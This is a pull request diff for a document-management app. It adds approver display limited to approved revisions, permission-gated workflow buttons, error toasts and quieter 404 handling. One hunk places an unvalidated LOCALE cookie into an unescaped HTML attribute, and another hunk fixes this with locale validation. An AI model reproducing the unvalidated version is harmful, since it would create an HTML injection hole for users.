### PR TITLE
fix: improve documents validation flows

### DIFF
--- a/backend/doc_management/models.py
+++ b/backend/doc_management/models.py
@@ -153,6 +153,12 @@ class DocumentRevision(AbstractBaseModel, FolderMixin):
         PUBLISHED = "published", _("Published")
         DEPRECATED = "deprecated", _("Deprecated")
 
+    # `reviewer` is also written by mark_change_requested(), so it only means
+    # "approver" once the revision reached one of these.
+    APPROVED_STATUSES = frozenset(
+        {Status.VALIDATED, Status.PUBLISHED, Status.DEPRECATED}
+    )
+
     document = models.ForeignKey(
         ManagedDocument, on_delete=models.CASCADE, related_name="revisions"
     )

--- a/backend/doc_management/templates/doc_management/policy_document_pdf.html
+++ b/backend/doc_management/templates/doc_management/policy_document_pdf.html
@@ -240,6 +240,12 @@ body {
                 <td>{{ author_name }}</td>
             </tr>
             {% endif %}
+            {% if reviewer_name %}
+            <tr>
+                <td>Approved by:</td>
+                <td>{{ reviewer_name }}</td>
+            </tr>
+            {% endif %}
             {% if published_at %}
             <tr>
                 <td>Published:</td>

--- a/backend/doc_management/tests.py
+++ b/backend/doc_management/tests.py
@@ -4,10 +4,10 @@ import pytest
 
 from core.models import Policy
 from core.net_safety import BlockedRequestError
-from doc_management.models import DocumentContainer
+from doc_management.models import DocumentContainer, DocumentRevision
 from doc_management.serializers import ManagedDocumentWriteSerializer
-from doc_management.views import _safe_url_fetcher
-from iam.models import Folder
+from doc_management.views import DocumentRevisionViewSet, _safe_url_fetcher
+from iam.models import Folder, User
 
 
 class TestSafeUrlFetcher:
@@ -295,3 +295,53 @@ class TestContainerGrouping:
         rev.refresh_from_db()
         assert rev.source == "link"
         assert rev.url == "https://example.com/policy"
+
+
+@pytest.mark.django_db
+class TestPdfApproverRow:
+    """`reviewer` is written by both approval and change-request, so the PDF must
+    only call that user an approver once the revision is actually approved."""
+
+    def _revision(self, status):
+        folder = Folder.objects.create(
+            name=f"PDF-{status}", parent_folder=Folder.get_root_folder()
+        )
+        s = ManagedDocumentWriteSerializer(
+            data={"folder": str(folder.id), "locale": "en", "name": "Doc"},
+            context={},
+        )
+        s.is_valid(raise_exception=True)
+        doc = s.save()
+        rev = doc.revisions.first()
+        rev.status = status
+        rev.reviewer = User.objects.create_user(email=f"rev-{status}@test.com")
+        rev.save()
+        return rev
+
+    def _reviewer_name(self, rev):
+        view = DocumentRevisionViewSet()
+        captured = {}
+
+        def capture(revision, context):
+            captured.update(context)
+            return "<html></html>"
+
+        view._resolve_document_html = capture
+        view._render_pdf_bytes(rev, rev.reviewer)
+        return captured["reviewer_name"]
+
+    def test_change_requested_reviewer_is_not_an_approver(self):
+        rev = self._revision(DocumentRevision.Status.CHANGE_REQUESTED)
+        assert self._reviewer_name(rev) == ""
+
+    def test_in_review_reviewer_is_not_an_approver(self):
+        rev = self._revision(DocumentRevision.Status.IN_REVIEW)
+        assert self._reviewer_name(rev) == ""
+
+    def test_published_revision_names_its_approver(self):
+        rev = self._revision(DocumentRevision.Status.PUBLISHED)
+        assert self._reviewer_name(rev) == str(rev.reviewer)
+
+    def test_validated_revision_names_its_approver(self):
+        rev = self._revision(DocumentRevision.Status.VALIDATED)
+        assert self._reviewer_name(rev) == str(rev.reviewer)

--- a/backend/doc_management/views.py
+++ b/backend/doc_management/views.py
@@ -1331,7 +1331,12 @@ class DocumentRevisionViewSet(BaseModelViewSet):
         content_html = mark_safe(self._inline_images(content_html, set(accessible_ids)))
 
         author_name = str(revision.author) if revision.author else ""
-        reviewer_name = str(revision.reviewer) if revision.reviewer else ""
+        reviewer_name = (
+            str(revision.reviewer)
+            if revision.reviewer
+            and revision.status in DocumentRevision.APPROVED_STATUSES
+            else ""
+        )
         doc = revision.document
         container = getattr(doc, "container", None)
         document_type_label = ""

--- a/backend/doc_management/views.py
+++ b/backend/doc_management/views.py
@@ -1331,7 +1331,6 @@ class DocumentRevisionViewSet(BaseModelViewSet):
         content_html = mark_safe(self._inline_images(content_html, set(accessible_ids)))
 
         author_name = str(revision.author) if revision.author else ""
-        # Who approved the revision — distinct from who drafted it.
         reviewer_name = str(revision.reviewer) if revision.reviewer else ""
         doc = revision.document
         container = getattr(doc, "container", None)

--- a/backend/doc_management/views.py
+++ b/backend/doc_management/views.py
@@ -1329,12 +1329,10 @@ class DocumentRevisionViewSet(BaseModelViewSet):
         )
 
         content_html = mark_safe(self._inline_images(content_html, set(accessible_ids)))
-        author_name = ""
-        if revision.author:
-            author_name = (
-                f"{revision.author.first_name} {revision.author.last_name}".strip()
-                or revision.author.email
-            )
+
+        author_name = str(revision.author) if revision.author else ""
+        # Who approved the revision — distinct from who drafted it.
+        reviewer_name = str(revision.reviewer) if revision.reviewer else ""
         doc = revision.document
         container = getattr(doc, "container", None)
         document_type_label = ""
@@ -1362,6 +1360,7 @@ class DocumentRevisionViewSet(BaseModelViewSet):
             "status": revision.status,
             "status_display": revision.get_status_display(),
             "author_name": author_name,
+            "reviewer_name": reviewer_name,
             "published_at": (
                 revision.published_at.strftime("%Y-%m-%d")
                 if revision.published_at

--- a/frontend/messages/en.json
+++ b/frontend/messages/en.json
@@ -947,6 +947,7 @@
 	"inProgress": "In progress",
 	"inReview": "In review",
 	"approved": "Approved",
+	"approvedBy": "Approved by",
 	"resolved": "Resolved",
 	"deprecated": "Deprecated",
 	"stale": "Stale",

--- a/frontend/messages/fr.json
+++ b/frontend/messages/fr.json
@@ -1007,6 +1007,7 @@
 	"inProgress": "En cours",
 	"inReview": "En révision",
 	"approved": "Approuvé",
+	"approvedBy": "Approuvé par",
 	"resolved": "Résolu",
 	"deprecated": "Déprécié",
 	"stale": "Obsolète",

--- a/frontend/src/hooks.server.ts
+++ b/frontend/src/hooks.server.ts
@@ -13,7 +13,7 @@ import { setFlash } from 'sveltekit-flash-message/server';
 import { loadFeatureFlags } from '$lib/feature-flags';
 import { logger, installJsonConsole } from '$lib/server/logger';
 import { paraglideMiddleware } from '$paraglide/server';
-import { defineCustomServerStrategy } from '$paraglide/runtime';
+import { defineCustomServerStrategy, toLocale } from '$paraglide/runtime';
 
 // Runs once at server start. When LOG_FORMAT=json, routes the whole SSR stdout
 // stream (including not-yet-migrated console.* call sites) through JSON output.
@@ -166,7 +166,9 @@ export const handle: Handle = async ({ event, resolve }) => {
 	// this each unmatched path costs two backend round-trips. route.id is set by now.
 	if (!event.route.id) {
 		event.locals.featureFlags = loadFeatureFlags();
-		const locale = event.cookies.get('LOCALE') || DEFAULT_LANGUAGE;
+		// %lang% is an unescaped HTML attribute and LOCALE is not httpOnly, so the
+		// cookie must be validated here the way paraglide would on the normal path.
+		const locale = toLocale(event.cookies.get('LOCALE')) ?? DEFAULT_LANGUAGE;
 		return resolve(event, {
 			transformPageChunk: ({ html }) => html.replace('%lang%', locale).replace('%theme%', '')
 		});

--- a/frontend/src/hooks.server.ts
+++ b/frontend/src/hooks.server.ts
@@ -162,6 +162,16 @@ export const handle: Handle = async ({ event, resolve }) => {
 		return resolve(event);
 	}
 
+	// No route matched: the 404 page needs no session, CSRF or locale, and without
+	// this each unmatched path costs two backend round-trips. route.id is set by now.
+	if (!event.route.id) {
+		event.locals.featureFlags = loadFeatureFlags();
+		const locale = event.cookies.get('LOCALE') || DEFAULT_LANGUAGE;
+		return resolve(event, {
+			transformPageChunk: ({ html }) => html.replace('%lang%', locale).replace('%theme%', '')
+		});
+	}
+
 	const localeForRequest = await ensureDefaultLocale(event);
 	fallbackLocaleStore.set(event.request, localeForRequest);
 

--- a/frontend/src/hooks.server.ts
+++ b/frontend/src/hooks.server.ts
@@ -1,7 +1,13 @@
 import { BASE_API_URL, DEFAULT_LANGUAGE } from '$lib/utils/constants';
 import { safeTranslate, setUseRiskCategoryLabel } from '$lib/utils/i18n';
 import type { User } from '$lib/utils/types';
-import { redirect, type Handle, type HandleFetch, type RequestEvent } from '@sveltejs/kit';
+import {
+	redirect,
+	type Handle,
+	type HandleFetch,
+	type HandleServerError,
+	type RequestEvent
+} from '@sveltejs/kit';
 import { setFlash } from 'sveltekit-flash-message/server';
 
 import { loadFeatureFlags } from '$lib/feature-flags';
@@ -225,6 +231,22 @@ export const handle: Handle = async ({ event, resolve }) => {
 			}
 		});
 	});
+};
+
+// Replaces SvelteKit's default error logger, which printed every unmatched path
+// as a two-line stderr entry. A 404 on a path that was never a route is not an
+// application error: vulnerability scanners alone can produce tens of thousands
+// of those lines. Real failures still go out through the structured logger.
+export const handleError: HandleServerError = ({ error, status, message, event }) => {
+	if (status !== 404) {
+		logger.error('unhandled_server_error', {
+			status,
+			method: event.request.method,
+			path: event.url.pathname,
+			error
+		});
+	}
+	return { message };
 };
 
 export const handleFetch: HandleFetch = async ({ request, fetch, event }) => {

--- a/frontend/src/lib/components/DocumentEditor/DocumentEditor.svelte
+++ b/frontend/src/lib/components/DocumentEditor/DocumentEditor.svelte
@@ -165,12 +165,8 @@
 		notifyError(data?.detail || data?.error || data?.message || m.error());
 	}
 
-	/**
-	 * Callers only ever branch on `res.ok`, so a rejected lifecycle transition
-	 * (403 from RBAC, 400 from a status guard) would otherwise fail in silence.
-	 * Pass `notify: false` when the caller renders the failure itself, or when
-	 * the call is best-effort cleanup the user never asked for.
-	 */
+	// Callers only branch on res.ok, so a refused transition would fail silently.
+	// notify:false = the caller renders it itself, or it is best-effort cleanup.
 	async function proxyPost(body: Record<string, any>, { notify = true } = {}) {
 		const res = await fetch(proxyUrl, {
 			method: 'POST',
@@ -720,8 +716,7 @@
 		}
 	}
 
-	// Lifecycle transitions are POSTs, which RBACPermissions maps to
-	// `add_documentrevision` on the revision's folder.
+	// RBACPermissions maps POST to add_<model>, hence add_documentrevision here.
 	let canTransition = $derived(
 		canPerformActionOnObject({
 			user: page.data.user,
@@ -730,9 +725,7 @@
 			object: currentRevision ?? document ?? parent
 		})
 	);
-	// The two delete buttons hit different endpoints, so they need different perms:
-	// the trash in the version history deletes a DocumentRevision, the toolbar
-	// button deletes the whole locale variant (a ManagedDocument).
+	// The two delete buttons hit different endpoints, hence different perms.
 	let canDeleteRevision = $derived(
 		canPerformActionOnObject({
 			user: page.data.user,

--- a/frontend/src/lib/components/DocumentEditor/DocumentEditor.svelte
+++ b/frontend/src/lib/components/DocumentEditor/DocumentEditor.svelte
@@ -7,6 +7,7 @@
 	import DocumentLinkModal from './DocumentLinkModal.svelte';
 	import { documentTypeLabel } from '$lib/utils/documentTypes';
 	import { fetchAllPages } from '$lib/utils/pagination';
+	import { pickWorkingRevision, APPROVED_REVISION_STATUSES } from '$lib/utils/documentRevisions';
 	import PromptConfirmModal from '$lib/components/Modals/PromptConfirmModal.svelte';
 	import {
 		getModalStore,
@@ -15,6 +16,9 @@
 		type ModalStore
 	} from '$lib/components/Modals/stores';
 	import { LOCALE_MAP } from '$lib/utils/locales';
+	import { getToastStore } from '$lib/components/Toast/stores';
+	import { page } from '$app/state';
+	import { canPerformActionOnObject } from '$lib/utils/access-control';
 
 	interface Props {
 		parent: any;
@@ -27,6 +31,11 @@
 	let { parent, data, proxyBase, backHref, createParentField = 'policy' }: Props = $props();
 
 	const modalStore: ModalStore = getModalStore();
+	const toastStore = getToastStore();
+
+	function notifyError(message: string) {
+		toastStore.trigger({ message, preset: 'error' });
+	}
 
 	let policy = $derived(parent);
 	let document = $state(data.document);
@@ -80,7 +89,10 @@
 		// Release the lock on the revision we're navigating away from (onDestroy's
 		// releaseLock won't fire — this component is reused, not remounted).
 		if (hasLock && currentRevision?.id) {
-			proxyPost({ _action: 'stop-editing', revision_id: currentRevision.id }).catch(() => {});
+			proxyPost(
+				{ _action: 'stop-editing', revision_id: currentRevision.id },
+				{ notify: false }
+			).catch(() => {});
 		}
 		stopHeartbeat();
 		hasLock = false;
@@ -145,17 +157,40 @@
 	// All API calls go through the +server.ts proxy
 	const proxyUrl = proxyBase;
 
-	async function proxyPost(body: Record<string, any>) {
-		return fetch(proxyUrl, {
+	async function reportFailure(res: Response) {
+		const data = await res
+			.clone()
+			.json()
+			.catch(() => null);
+		notifyError(data?.detail || data?.error || data?.message || m.error());
+	}
+
+	/**
+	 * Callers only ever branch on `res.ok`, so a rejected lifecycle transition
+	 * (403 from RBAC, 400 from a status guard) would otherwise fail in silence.
+	 * Pass `notify: false` when the caller renders the failure itself, or when
+	 * the call is best-effort cleanup the user never asked for.
+	 */
+	async function proxyPost(body: Record<string, any>, { notify = true } = {}) {
+		const res = await fetch(proxyUrl, {
 			method: 'POST',
 			headers: { 'Content-Type': 'application/json' },
 			body: JSON.stringify(body)
 		});
+		if (!res.ok && notify) await reportFailure(res);
+		return res;
 	}
 
 	async function proxyGet(params: Record<string, string>) {
 		const qs = new URLSearchParams(params).toString();
 		return fetch(`${proxyUrl}?${qs}`);
+	}
+
+	async function proxyDelete(params: Record<string, string>) {
+		const qs = new URLSearchParams(params).toString();
+		const res = await fetch(`${proxyUrl}?${qs}`, { method: 'DELETE' });
+		if (!res.ok) await reportFailure(res);
+		return res;
 	}
 
 	// --- Document references (E.2) --------------------------------------------
@@ -212,7 +247,10 @@
 		if (locale === currentLocale) return;
 		// Release lock on current revision
 		if (currentRevision?.id && hasLock) {
-			await proxyPost({ _action: 'stop-editing', revision_id: currentRevision.id });
+			await proxyPost(
+				{ _action: 'stop-editing', revision_id: currentRevision.id },
+				{ notify: false }
+			);
 			hasLock = false;
 			stopHeartbeat();
 		}
@@ -239,7 +277,10 @@
 		showLocalePicker = false;
 		// Release lock on current revision before switching to template selector
 		if (currentRevision?.id && hasLock) {
-			await proxyPost({ _action: 'stop-editing', revision_id: currentRevision.id });
+			await proxyPost(
+				{ _action: 'stop-editing', revision_id: currentRevision.id },
+				{ notify: false }
+			);
 			hasLock = false;
 			stopHeartbeat();
 		}
@@ -274,8 +315,7 @@
 			return;
 		}
 
-		const activeStatuses = ['draft', 'change_requested', 'in_review', 'validated'];
-		const target = revisions.find((r: any) => activeStatuses.includes(r.status)) ?? revisions[0];
+		const target = pickWorkingRevision(revisions, document.current_revision?.id);
 		if (!target) return;
 
 		const fullRes = await proxyGet({ _action: 'revision', revision_id: target.id });
@@ -294,13 +334,16 @@
 		saveConflict = '';
 		if (saveTimeout) clearTimeout(saveTimeout);
 		try {
-			const res = await proxyPost({
-				_action: 'save-revision',
-				revision_id: currentRevision.id,
-				content,
-				change_summary: changeSummary,
-				expected_updated_at: lastLoadedAt
-			});
+			const res = await proxyPost(
+				{
+					_action: 'save-revision',
+					revision_id: currentRevision.id,
+					content,
+					change_summary: changeSummary,
+					expected_updated_at: lastLoadedAt
+				},
+				{ notify: false }
+			);
 			if (res.ok) {
 				currentRevision = await res.json();
 				lastLoadedAt = currentRevision.updated_at || '';
@@ -330,7 +373,10 @@
 		if (!saveOk) return;
 		// Release lock before transitioning — revision won't be editable in in_review
 		if (hasLock) {
-			await proxyPost({ _action: 'stop-editing', revision_id: currentRevision.id });
+			await proxyPost(
+				{ _action: 'stop-editing', revision_id: currentRevision.id },
+				{ notify: false }
+			);
 			hasLock = false;
 			stopHeartbeat();
 		}
@@ -413,8 +459,7 @@
 
 	function deleteRevision(revisionId: string) {
 		confirmAndDelete(m.deleteRevision(), m.deleteRevisionConfirmation(), async () => {
-			const qs = new URLSearchParams({ _type: 'revision', id: revisionId }).toString();
-			const res = await fetch(`${proxyUrl}?${qs}`, { method: 'DELETE' });
+			const res = await proxyDelete({ _type: 'revision', id: revisionId });
 			if (res.ok) {
 				await refreshData();
 			}
@@ -425,8 +470,7 @@
 		if (!document) return;
 		confirmAndDelete(m.deleteDocumentTitle(), m.deleteDocumentConfirmation(), async () => {
 			const deletedLocale = currentLocale;
-			const qs = new URLSearchParams({ _type: 'document', id: document.id }).toString();
-			const res = await fetch(`${proxyUrl}?${qs}`, { method: 'DELETE' });
+			const res = await proxyDelete({ _type: 'document', id: document.id });
 			if (res.ok) {
 				// Release lock state
 				hasLock = false;
@@ -480,7 +524,10 @@
 	async function loadRevision(revisionId: string) {
 		// Release lock on previous revision
 		if (hasLock && currentRevision?.id) {
-			await proxyPost({ _action: 'stop-editing', revision_id: currentRevision.id });
+			await proxyPost(
+				{ _action: 'stop-editing', revision_id: currentRevision.id },
+				{ notify: false }
+			);
 		}
 		hasLock = false;
 		const res = await proxyGet({ _action: 'revision', revision_id: revisionId });
@@ -672,6 +719,36 @@
 			showDiff = false;
 		}
 	}
+
+	// Lifecycle transitions are POSTs, which RBACPermissions maps to
+	// `add_documentrevision` on the revision's folder.
+	let canTransition = $derived(
+		canPerformActionOnObject({
+			user: page.data.user,
+			action: 'add',
+			model: 'documentrevision',
+			object: currentRevision ?? document ?? parent
+		})
+	);
+	// The two delete buttons hit different endpoints, so they need different perms:
+	// the trash in the version history deletes a DocumentRevision, the toolbar
+	// button deletes the whole locale variant (a ManagedDocument).
+	let canDeleteRevision = $derived(
+		canPerformActionOnObject({
+			user: page.data.user,
+			action: 'delete',
+			model: 'documentrevision',
+			object: currentRevision ?? document ?? parent
+		})
+	);
+	let canDeleteDocument = $derived(
+		canPerformActionOnObject({
+			user: page.data.user,
+			action: 'delete',
+			model: 'manageddocument',
+			object: document ?? parent
+		})
+	);
 
 	let isDraft = $derived(currentRevision?.status === 'draft');
 	let isChangeRequested = $derived(currentRevision?.status === 'change_requested');
@@ -950,32 +1027,57 @@
 						<span class="ml-1">{m.save()}</span>
 					{/if}
 				</button>
-				<button class="btn btn-sm preset-filled-warning-500" onclick={() => submitForReview()}>
+				<button
+					class="btn btn-sm preset-filled-warning-500"
+					disabled={!canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={() => submitForReview()}
+				>
 					<i class="fa-solid fa-paper-plane"></i>
 					<span class="ml-1 hidden lg:inline">{m.submitForReview()}</span>
 				</button>
 			{/if}
 
 			{#if isInReview}
-				<button class="btn btn-sm preset-filled-success-500" onclick={() => approve()}>
+				<button
+					class="btn btn-sm preset-filled-success-500"
+					disabled={!canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={() => approve()}
+				>
 					<i class="fa-solid fa-check"></i>
 					<span class="ml-1">{m.approve()}</span>
 				</button>
-				<button class="btn btn-sm preset-filled-error-500" onclick={() => requestChanges()}>
+				<button
+					class="btn btn-sm preset-filled-error-500"
+					disabled={!canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={() => requestChanges()}
+				>
 					<i class="fa-solid fa-rotate-left"></i>
 					<span class="ml-1 hidden lg:inline">{m.requestChanges()}</span>
 				</button>
 			{/if}
 
 			{#if currentRevision?.status === 'validated'}
-				<button class="btn btn-sm preset-filled-success-500" onclick={() => publishRevision()}>
+				<button
+					class="btn btn-sm preset-filled-success-500"
+					disabled={!canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={() => publishRevision()}
+				>
 					<i class="fa-solid fa-upload"></i>
 					<span class="ml-1">{m.publish()}</span>
 				</button>
 			{/if}
 
 			{#if !hasActiveRevision && document}
-				<button class="btn btn-sm preset-filled-primary-500" onclick={() => createNewDraft()}>
+				<button
+					class="btn btn-sm preset-filled-primary-500"
+					disabled={!canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={() => createNewDraft()}
+				>
 					<i class="fa-solid fa-plus"></i>
 					<span class="ml-1 hidden lg:inline">{m.createNewDraft()}</span>
 				</button>
@@ -984,8 +1086,9 @@
 			{#if document}
 				<button
 					class="btn btn-sm preset-tonal-error"
+					disabled={!canDeleteDocument}
 					onclick={() => deleteDocument()}
-					title={m.deleteDocumentAndRevisions()}
+					title={canDeleteDocument ? m.deleteDocumentAndRevisions() : m.permissionDenied()}
 				>
 					<i class="fa-solid fa-trash"></i>
 				</button>
@@ -1446,7 +1549,14 @@
 									</div>
 									{#if revision.author}
 										<p class="text-xs text-surface-500 truncate">
+											<i class="fa-solid fa-pen text-[9px] opacity-70"></i>
 											{revision.author.str || revision.author.email || ''}
+										</p>
+									{/if}
+									{#if revision.reviewer && APPROVED_REVISION_STATUSES.includes(revision.status)}
+										<p class="text-xs text-surface-500 truncate">
+											<i class="fa-solid fa-circle-check text-[9px] opacity-70"></i>
+											{m.approvedBy()}: {revision.reviewer.str || revision.reviewer.email || ''}
 										</p>
 									{/if}
 									{#if revision.change_summary}
@@ -1463,7 +1573,7 @@
 												minute: '2-digit'
 											})}
 										</p>
-										{#if revision.status === 'draft' || revision.status === 'deprecated'}
+										{#if (revision.status === 'draft' || revision.status === 'deprecated') && canDeleteRevision}
 											<button
 												class="text-[10px] text-surface-500 hover:text-red-500 transition-colors p-0.5"
 												onclick={(e) => {

--- a/frontend/src/lib/components/DocumentEditor/DocumentEditor.svelte
+++ b/frontend/src/lib/components/DocumentEditor/DocumentEditor.svelte
@@ -311,7 +311,7 @@
 			return;
 		}
 
-		const target = pickWorkingRevision(revisions, document.current_revision?.id);
+		const target = pickWorkingRevision(revisions);
 		if (!target) return;
 
 		const fullRes = await proxyGet({ _action: 'revision', revision_id: target.id });

--- a/frontend/src/lib/components/DocumentEditor/LinkedDocumentView.svelte
+++ b/frontend/src/lib/components/DocumentEditor/LinkedDocumentView.svelte
@@ -57,8 +57,7 @@
 	};
 
 	let status = $derived(currentRevision?.status as string | undefined);
-	// Lifecycle transitions are POSTs, which RBACPermissions maps to
-	// `add_documentrevision` on the revision's folder.
+	// RBACPermissions maps POST to add_<model>, hence add_documentrevision here.
 	let canTransition = $derived(
 		canPerformActionOnObject({
 			user: page.data.user,
@@ -67,8 +66,7 @@
 			object: currentRevision ?? document ?? parent
 		})
 	);
-	// The delete button removes the whole locale variant (a ManagedDocument),
-	// so it needs delete on that model, not on DocumentRevision.
+	// Deletes the whole locale variant, not a revision.
 	let canDeleteDocument = $derived(
 		canPerformActionOnObject({
 			user: page.data.user,

--- a/frontend/src/lib/components/DocumentEditor/LinkedDocumentView.svelte
+++ b/frontend/src/lib/components/DocumentEditor/LinkedDocumentView.svelte
@@ -2,6 +2,9 @@
 	import { m } from '$paraglide/messages';
 	import { invalidateAll, goto } from '$app/navigation';
 	import { LOCALE_MAP } from '$lib/utils/locales';
+	import { APPROVED_REVISION_STATUSES } from '$lib/utils/documentRevisions';
+	import { page } from '$app/state';
+	import { canPerformActionOnObject } from '$lib/utils/access-control';
 	import { getToastStore } from '$lib/components/Toast/stores';
 	import {
 		getModalStore,
@@ -54,6 +57,27 @@
 	};
 
 	let status = $derived(currentRevision?.status as string | undefined);
+	// Lifecycle transitions are POSTs, which RBACPermissions maps to
+	// `add_documentrevision` on the revision's folder.
+	let canTransition = $derived(
+		canPerformActionOnObject({
+			user: page.data.user,
+			action: 'add',
+			model: 'documentrevision',
+			object: currentRevision ?? document ?? parent
+		})
+	);
+	// The delete button removes the whole locale variant (a ManagedDocument),
+	// so it needs delete on that model, not on DocumentRevision.
+	let canDeleteDocument = $derived(
+		canPerformActionOnObject({
+			user: page.data.user,
+			action: 'delete',
+			model: 'manageddocument',
+			object: document ?? parent
+		})
+	);
+
 	let isDraft = $derived(status === 'draft' || status === 'change_requested');
 	let isInReview = $derived(status === 'in_review');
 	let isValidated = $derived(status === 'validated');
@@ -167,7 +191,10 @@
 				method: 'DELETE'
 			});
 			if (res.ok) await goto(backHref);
-			else notifyError(m.deleteFailed());
+			else {
+				const data = await res.json().catch(() => null);
+				notifyError(data?.detail || data?.error || m.deleteFailed());
+			}
 		} finally {
 			busy = false;
 		}
@@ -275,7 +302,8 @@
 			<div class="flex gap-2">
 				<button
 					class="btn btn-sm preset-filled-primary-500"
-					disabled={busy || !editUrl.trim()}
+					disabled={busy || !editUrl.trim() || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
 					onclick={saveLink}
 				>
 					{m.save()}
@@ -337,26 +365,43 @@
 			{#if isDraft}
 				<button
 					class="btn btn-sm preset-filled-primary-500"
-					disabled={busy}
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
 					onclick={submitForReview}
 				>
 					{m.submitForReview()}
 				</button>
 			{:else if isInReview}
-				<button class="btn btn-sm preset-filled-success-500" disabled={busy} onclick={approve}>
+				<button
+					class="btn btn-sm preset-filled-success-500"
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={approve}
+				>
 					{m.approve()}
 				</button>
-				<button class="btn btn-sm preset-tonal-error" disabled={busy} onclick={requestChanges}>
+				<button
+					class="btn btn-sm preset-tonal-error"
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={requestChanges}
+				>
 					{m.requestChanges()}
 				</button>
 			{:else if isValidated}
-				<button class="btn btn-sm preset-filled-success-500" disabled={busy} onclick={publish}>
+				<button
+					class="btn btn-sm preset-filled-success-500"
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={publish}
+				>
 					{m.publish()}
 				</button>
 			{/if}
 			<button
 				class="btn btn-sm preset-tonal-error ml-auto"
-				disabled={busy}
+				disabled={busy || !canDeleteDocument}
+				title={canDeleteDocument ? undefined : m.permissionDenied()}
 				onclick={deleteDocument}
 			>
 				<i class="fa-solid fa-trash mr-2"></i>{m.delete()}
@@ -375,7 +420,15 @@
 			>
 				{#each revisions as rev (rev.id)}
 					<li class="flex items-center justify-between gap-2 px-4 py-2.5 text-sm">
-						<span>v{rev.version_number} · {rev.status_display ?? rev.status}</span>
+						<span class="min-w-0">
+							v{rev.version_number} · {rev.status_display ?? rev.status}
+							{#if rev.reviewer && APPROVED_REVISION_STATUSES.includes(rev.status)}
+								<span class="block truncate text-xs text-surface-500">
+									<i class="fa-solid fa-circle-check text-[9px] opacity-70"></i>
+									{m.approvedBy()}: {rev.reviewer.str || rev.reviewer.email || ''}
+								</span>
+							{/if}
+						</span>
 						{#if rev.url}
 							<a
 								href={rev.url}

--- a/frontend/src/lib/components/DocumentEditor/UploadedDocumentView.svelte
+++ b/frontend/src/lib/components/DocumentEditor/UploadedDocumentView.svelte
@@ -2,6 +2,9 @@
 	import { m } from '$paraglide/messages';
 	import { invalidateAll, goto } from '$app/navigation';
 	import { LOCALE_MAP } from '$lib/utils/locales';
+	import { APPROVED_REVISION_STATUSES } from '$lib/utils/documentRevisions';
+	import { page } from '$app/state';
+	import { canPerformActionOnObject } from '$lib/utils/access-control';
 	import { getToastStore } from '$lib/components/Toast/stores';
 	import {
 		getModalStore,
@@ -56,6 +59,27 @@
 	};
 
 	let status = $derived(currentRevision?.status as string | undefined);
+	// Lifecycle transitions are POSTs, which RBACPermissions maps to
+	// `add_documentrevision` on the revision's folder.
+	let canTransition = $derived(
+		canPerformActionOnObject({
+			user: page.data.user,
+			action: 'add',
+			model: 'documentrevision',
+			object: currentRevision ?? document ?? parent
+		})
+	);
+	// The delete button removes the whole locale variant (a ManagedDocument),
+	// so it needs delete on that model, not on DocumentRevision.
+	let canDeleteDocument = $derived(
+		canPerformActionOnObject({
+			user: page.data.user,
+			action: 'delete',
+			model: 'manageddocument',
+			object: document ?? parent
+		})
+	);
+
 	let isDraft = $derived(status === 'draft' || status === 'change_requested');
 	let isInReview = $derived(status === 'in_review');
 	let isValidated = $derived(status === 'validated');
@@ -178,7 +202,10 @@
 				method: 'DELETE'
 			});
 			if (res.ok) await goto(backHref);
-			else notifyError(m.deleteFailed());
+			else {
+				const data = await res.json().catch(() => null);
+				notifyError(data?.detail || data?.error || m.deleteFailed());
+			}
 		} finally {
 			busy = false;
 		}
@@ -321,31 +348,53 @@
 		<div class="flex flex-wrap items-center gap-2 border-t border-surface-200-800 pt-4">
 			<input type="file" class="hidden" bind:this={fileInput} onchange={onFilePicked} />
 			{#if isDraft}
-				<button class="btn btn-sm preset-tonal" disabled={busy} onclick={() => fileInput?.click()}>
+				<button
+					class="btn btn-sm preset-tonal"
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={() => fileInput?.click()}
+				>
 					<i class="fa-solid fa-file-arrow-up mr-2"></i>{m.replaceFile()}
 				</button>
 				<button
 					class="btn btn-sm preset-filled-primary-500"
-					disabled={busy}
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
 					onclick={submitForReview}
 				>
 					{m.submitForReview()}
 				</button>
 			{:else if isInReview}
-				<button class="btn btn-sm preset-filled-success-500" disabled={busy} onclick={approve}>
+				<button
+					class="btn btn-sm preset-filled-success-500"
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={approve}
+				>
 					{m.approve()}
 				</button>
-				<button class="btn btn-sm preset-tonal-error" disabled={busy} onclick={requestChanges}>
+				<button
+					class="btn btn-sm preset-tonal-error"
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={requestChanges}
+				>
 					{m.requestChanges()}
 				</button>
 			{:else if isValidated}
-				<button class="btn btn-sm preset-filled-success-500" disabled={busy} onclick={publish}>
+				<button
+					class="btn btn-sm preset-filled-success-500"
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
+					onclick={publish}
+				>
 					{m.publish()}
 				</button>
 			{:else if isPublished}
 				<button
 					class="btn btn-sm preset-filled-primary-500"
-					disabled={busy}
+					disabled={busy || !canTransition}
+					title={canTransition ? undefined : m.permissionDenied()}
 					onclick={() => fileInput?.click()}
 				>
 					<i class="fa-solid fa-file-arrow-up mr-2"></i>{m.uploadNewVersion()}
@@ -353,7 +402,8 @@
 			{/if}
 			<button
 				class="btn btn-sm preset-tonal-error ml-auto"
-				disabled={busy}
+				disabled={busy || !canDeleteDocument}
+				title={canDeleteDocument ? undefined : m.permissionDenied()}
 				onclick={deleteDocument}
 			>
 				<i class="fa-solid fa-trash mr-2"></i>{m.delete()}
@@ -372,7 +422,15 @@
 			>
 				{#each revisions as rev (rev.id)}
 					<li class="flex items-center justify-between gap-2 px-4 py-2.5 text-sm">
